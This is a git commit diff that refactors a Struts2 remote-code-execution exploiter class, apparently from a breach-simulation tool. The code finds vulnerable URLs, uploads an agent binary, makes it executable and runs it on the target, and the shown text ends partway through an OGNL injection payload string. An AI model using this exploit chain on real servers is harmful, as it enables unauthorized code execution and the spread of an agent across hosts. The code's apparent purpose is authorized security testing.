Struts2 refactored for framework fixes

This commit is contained in:
Vakaris 2018-08-10 15:04:23 +03:00
parent bbd4adf2ae
commit 6cb058eb1d
1 changed files with 11 additions and 15 deletions

View File

@ -26,45 +26,39 @@ class Struts2Exploiter(WebRCE):
super(Struts2Exploiter, self).__init__(host)
def exploit_host(self):
# We need a reference to the exploiter for WebRCE framework to use
exploiter = self.exploit
# Get open ports
ports = WebRCE.get_ports_w(self.host, self.HTTP, ["http"])
ports = self.get_ports_w(self.HTTP, ["http"])
if not ports:
return False
# Get urls to try to exploit
urls = WebRCE.build_potential_urls(self.host, ports)
urls = self.build_potential_urls(ports)
vulnerable_urls = []
for url in urls:
# Get full URL
url = self.get_redirected(url)
if WebRCE.check_if_exploitable(exploiter, url):
if self.check_if_exploitable(url):
vulnerable_urls.append(url)
self._exploit_info['vulnerable_urls'] = vulnerable_urls
if not vulnerable_urls:
return False
# We need to escape backslashes for our exploiter
config = copy.deepcopy(self._config)
config.dropper_target_path_win_32 = re.sub(r"\\", r"\\\\", config.dropper_target_path_win_32)
config.dropper_target_path_win_64 = re.sub(r"\\", r"\\\\", config.dropper_target_path_win_64)
if self.skip_exist and WebRCE.check_remote_files(self.host, exploiter, vulnerable_urls[0], config):
if self.skip_exist and self.check_remote_files(vulnerable_urls[0]):
LOG.info("Host %s was already infected under the current configuration, done" % self.host)
return True
if not WebRCE.set_host_arch(self.host, exploiter, vulnerable_urls[0]):
if not self.set_host_arch(vulnerable_urls[0]):
return False
data = WebRCE.upload_monkey(self.host, config, exploiter, vulnerable_urls[0])
data = self.upload_monkey(vulnerable_urls[0])
# We can't use 'if not' because response may be ''
if data is not False and data['response'] == False:
if data is not False and data['response'] is False:
return False
if WebRCE.change_permissions(self.host, vulnerable_urls[0], exploiter, data['path']) == False:
if self.change_permissions(vulnerable_urls[0], data['path']) is False:
return False
if WebRCE.execute_remote_monkey(self.host, vulnerable_urls[0], exploiter, data['path'], True) == False:
if self.execute_remote_monkey(vulnerable_urls[0], data['path'], True) is False:
return False
return True
@ -86,6 +80,8 @@ class Struts2Exploiter(WebRCE):
:param cmd: Code to try and execute on host
:return: response
"""
cmd = re.sub(r"\\", r"\\\\", cmd)
cmd = re.sub(r"'", r"\\'", cmd)
payload = "%%{(#_='multipart/form-data')." \
"(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." \
"(#_memberAccess?" \